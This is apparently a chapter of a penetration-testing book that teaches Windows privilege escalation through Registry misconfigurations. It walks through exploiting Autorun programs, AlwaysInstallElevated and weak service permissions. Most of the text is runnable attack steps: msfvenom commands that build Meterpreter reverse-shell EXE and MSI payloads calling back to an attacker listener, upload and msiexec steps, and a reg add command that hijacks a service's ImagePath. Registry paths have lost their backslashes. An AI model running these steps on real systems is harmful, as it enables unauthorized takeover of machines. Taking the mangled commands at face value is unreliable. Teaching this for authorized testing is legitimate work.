You should now have a good grasp of how to identify and perform some of the most important privilege escalation techniques on Windows. However, one final piece of this puzzle remains: the Windows Registry. In this chapter, we will look at how to elevate privileges on the target system by leveraging misconfigurations and weaknesses in the Windows Registry.
We will explore the process of identifying misconfigurations in the registry, utilizing the Autorun functionality, exploiting weak registry permissions, and the AlwaysInstallElevated feature to elevate our privileges. We will also provide a brief overview of the Windows Registry to understand its purpose and functionality.
In this chapter, we're going to cover the following main topics:
To follow along with the demonstrations in this chapter, you will need to ensure that you meet the following technical requirements:
You can view this chapter's code in action here: https://bit.ly/3oga2ji
Before we can dig into the meat and potatoes of this chapter, we must have a functional understanding of the Windows Registry, what it is used for, and how it works.
This information will prove useful in the latter sections of this chapter and will provide a much better context of what we are doing, as well as what we want to achieve, when we utilize various privilege escalation techniques.
Simply put, the Windows Registry is a hierarchical database that is responsible for storing configurations, settings, and values for applications, hardware, and the Windows operating system. In the context of programs and applications, the registry is also used to store program and application data relevant to the configuration and operation of the program.
Given the centralized nature of the Windows Registry and the data it stores, it is a prime target for penetration testers during the privilege escalation process. This is because it can reveal information about the operating system's configuration and the configuration of the programs that have been installed on the target system. These configurations can reveal potential weaknesses in various Windows services, such as the Autorun feature.
In Chapter 4, Performing Local Enumeration, we explored various enumeration techniques that can be used to exfiltrate important and useful data from the registry primarily pertaining to application passwords. However, we did not explore the process of enumerating important operating system configurations that can be used to exploit services and other Windows features.
In this chapter, we will be exploring the process of identifying these operating system misconfigurations in the Windows Registry and how they can be leveraged to elevate our privileges.
Note
Note that programs and applications are not required to store configurations in the Windows Registry and may opt to store them within the program installation directory. You must keep this in mind when searching for misconfigurations and vulnerabilities in programs and applications.
We can access the Windows Registry on a Windows system by running the regedit.exe executable. This can be done through the Windows Command Prompt or the Run utility, as highlighted in the following screenshot:
Note
The Windows Registry Editor (regedit.exe), is a built-in Windows executable that is used to interact with the Windows Registry and allows users to view and edit registry entries.
As shown in the following screenshot, the Windows Registry uses a hierarchical sorting system that categorizes data as keys and values based on its functionality and purpose:
The Windows Registry Editor displays various keys that contain their respective values. Now, let's take a look at how these keys and values are stored and categorized.
The Windows Registry operates under a key/value system, where entries store their data in the form of a key and data pair.
To understand how keys and values work in the context of the Windows Registry, we can use the categorization analogy of folders and files, where keys are folders and values are files.
The Windows Registry Editor displays a categorized list of root keys that contain all the registry values on the system. The following table provides a description of each root key, its abbreviation, and the nature of the respective values it stores:
Now that you understand how the Windows Registry stores data, the various root keys, and the type of information they store, we can begin exploring the process of identifying operating misconfigurations in the Windows Registry.
This process is dynamic and, as a result, will depend on the target configuration and deployment use case, primarily because the techniques involved in this process will depend on the implementation and configuration of particular services.
Given the robust nature of this process and the techniques used, we will be utilizing the Windows 7 virtual machine that we configured in Chapter 8, Exploiting Services. This has been configured with vulnerable services and configurations.
Before we begin, ensure that you have a foothold on the target system and have access to it through a command shell or Meterpreter session.
The techniques and tools used in this chapter will involve utilizing native Windows commands and specific Meterpreter modules to automate various aspects of the process.
We will begin by looking at how to identify and exploit Autorun programs in order to elevate our privileges.
Autorun is a Windows feature that is used to automatically start applications and programs during system startup.
Autorun is a companion feature to AutoPlay that is typically used to automate the startup of setup files for specific programs. This helps streamline the installation of new software when the installation media is inserted into the system.
Programs and software can be configured to run on system startup with the Autorun feature.
The Autorun feature is disabled by default in newer versions of Windows such as Windows 10; however, Microsoft has provided users with the ability to enable it. This technique will require the Autorun feature to be enabled on the target.
We can elevate our privileges through Autorun by identifying programs that have been configured to run on system startup, as well as those that can be run by users with administrative privileges. We can then use these to elevate our privileges.
This process can be performed completing the following steps:
reg query HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
As highlighted in the following screenshot, this will display a list of Autorun applications:
After downloading the accesschk executable to our Kali virtual machine, we will need to transfer it to the target system. This can be done through Meterpreter by running the following command:
upload /<PATH-TO-EXECUTABLE/accesschk64.exe
If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.
After uploading the accesschk.exe binary to the target system, we can enumerate a list of all Autoruns programs by running the following command in the Windows command shell:
.accesschk64.exe -wvu "c:Program Files Autorun Program"
As highlighted in the following screenshot, this will highlight a list of Autorun programs, their access permissions, and their respective directories:
Note
RW indicates that the groups have read and write permissions and, as a result, can make changes to the contents of the program directory.
As highlighted in the preceding screenshot, we identified the program.exe exactable and its permissions. In this case, the executable has NT AUTHORITY SYSTEM access permissions. We can utilize this program to elevate our privileges by replacing the program executable with a Meterpreter shell executable that will be automatically executed when the administrator logs in, providing us with an elevated Meterpreter session.
The next step will involve generating the reverse shell executable and uploading it to the target system.
Note
This privilege escalation technique requires the administrator to log on to the system for the Autorun program to be executed.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LISTENER-IP> LPORT=<PORT> -f exe > /home/kali/Desktop/program.exe
Note
The reverse shell payload should have the same name of the program we are trying to exploit, and it should be uploaded to the respective service path we identified earlier and highlighted here.
C:Program FilesAutorun Program
mv program.exe program_backup.exe
upload /home/kali/Desktop/program.exe
If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.
As highlighted in the following screenshot, this will upload the Meterpreter executable to the Autorun Program directory:
use /exploit/multi/handler
set payload /windows/x64/meterpreter/reverse_tcp
Now, we need to configure the module options. In this case, we need to configure the LHOST and LPORT options, as highlighted in the following screenshot:
run
The listener will listen for any incoming connections from the payload we generated with MSFvenom.
With that, we have successfully elevated our privileges by leveraging an Autorun program with misconfigured permissions.
AlwaysInstallElevated is a Windows feature that allows standard user accounts with no administrative privileges to install software packaged in the Microsoft Windows Installer (MSI) format with administrative privileges.
We can leverage this configuration to elevate our privileges by generating a custom executable with the MSI format. Then, we can utilize the msiexec utility to execute the MSI executable, which will give us an elevated session.
This feature is commonly misconfigured in companies and organizations, primarily for ease of access for employees or is mistakenly left enabled by administrators after setting up a workstation. Either way, this technique will allow us to elevate our privileges in a relatively straightforward manner.
The Always Install Elevated feature is configured in the Windows Registry and as a result, we can query the registry to determine whether the feature is enabled before we begin the privilege escalation process.
Let's look at how to perform this technique both manually and automatically with the Metasploit framework.
Note
If this feature is not enabled on the target system, this technique will not work.
To perform this technique, follow these steps:
reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
As highlighted in the following screenshot, this will output the registry configuration for the AlwaysInstallElevated feature and its value. If the highlighted value in the following screenshot is set to 0, the feature is disabled, while if the value is set to 1, the feature is enabled:
In this case, we determined that the AlwaysInstallElevated feature is enabled and can therefore be leveraged to elevate our privileges.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=<PORT> -f msi > setup.msi
C:Temp
Now, we can upload the custom MSI executable to the temporary directory on the target using Meterpreter by running the following command:
upload /home/kali/Desktop/setup.msi
If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.
As shown in the following screenshot, this will upload the Meterpreter executable to the Autorun Program directory:
use /exploit/multi/handler
set payload /windows/x64/meterpreter/reverse_tcp
Now, we need to configure the module options. In this case, we need to configure the LHOST and LPORT options, as highlighted in the following screenshot:
After setting the module options, we can start the listener by running the following command:
run
The listener will listen for any incoming connections from the custom MSI executable we generated with MSFvenom.
msiexec /quiet /qn /i C:/temp/setup.msi
If successful, this will spawn an elevated Meterpreter session on our listener, as highlighted in the following screenshot:
net localgroup administrators
As highlighted in the following screenshot, the Win7 user has been added to the local administrators' group and has administrative privileges:
With that, we successfully elevated our privileges by leveraging the AlwaysInstallElevated feature manually.
We can also automate the process by using a Metasploit module:
use exploit/windows/local/always_install_elevated
set SESSION <SESSION-ID>
As illustrated in the following screenshot, the SESSION option should reflect the session ID you set:
run
If the exploit is successful, you should get a new elevated Meterpreter session, as highlighted in following screenshot:
With that, we successfully elevated our privileges by leveraging the AlwaysInstallElevated feature on Windows both manually and automatically with Metasploit.
This privilege escalation technique involves identifying and modifying the registry values of a service with a standard user account. In many cases, writing or modifying values in the Windows Registry is limited to administrators. However, you may come across services that can be modified by standard user accounts.
We can leverage this vulnerability to modify the ImagePath (the application path) of a service with the path of a custom executable. This will give us an elevated session when the service is restarted.
This technique will only work on systems that have at least one or more services with weak permissions.
The exploitation process can be performed by following these steps:
The winPEAS binary can be downloaded from the following GitHub repository: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe.
Ensure you download the correct binary based on the architecture of your target operating system; the architecture-specific binaries can be found in the binaries folder, as highlighted in the following screenshot:
After downloading the binary to our Kali VM, we need to transfer the winPEAS.exe binary to our target virtual machine.
upload /<PATH-To-BINARY>/winPEASx64.exe
If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.
.winPEASx64.exe servicesinfo
As shown in the following screenshot, this will enumerate a list of service registry values that can be modified. In our case, we can identify the regsvc service, which has the required permissions:
In this case, we can modify the service and modify the ImagePath with the path to our own Meterpreter executable.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=<PORT> -f exe > shell.exe
C:Temp
upload /home/kali/Desktop/shell.exe
If you are using a standard command shell, you can use the certutil utility to transfer the binary to the target system.
As shown in the following screenshot, this will upload the Meterpreter executable to the temporary directory:
use /exploit/multi/handler
set payload /windows/x64/meterpreter/reverse_tcp
Now, we need to configure the module options. In this case, we need to configure the LHOST and LPORT options, as highlighted in the following screenshot:
run
The listener will listen for any incoming connections from the custom executable we generated with MSFvenom.
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservices egsvc" /t REG_EXPAND_SZ /v ImagePath /d "C:Tempshell.exe" /f
If successful, the new value should be written. Now the service will execute our custom executable the next time it is started or restarted.
sc start regsvc
You should now have a good grasp of how to identify misconfigurations in the Windows Registry, as well as how to leverage them to elevate your privileges on a target system.
In this chapter, we understood how the Windows Registry works and how it stores data. Then, we explored the process of identifying and exploiting the Autorun feature on Windows to elevate our privileges. We also explored the process of leveraging the AlwaysInstallElevated feature on Windows to elevate our privileges, both manually and automatically, with Metasploit. Finally, we looked at how to exploit weak registry service permissions.
In the next chapter, we will begin the privilege escalation process on Linux by exploring the process of identifying and utilizing kernel exploits.
3.144.86.138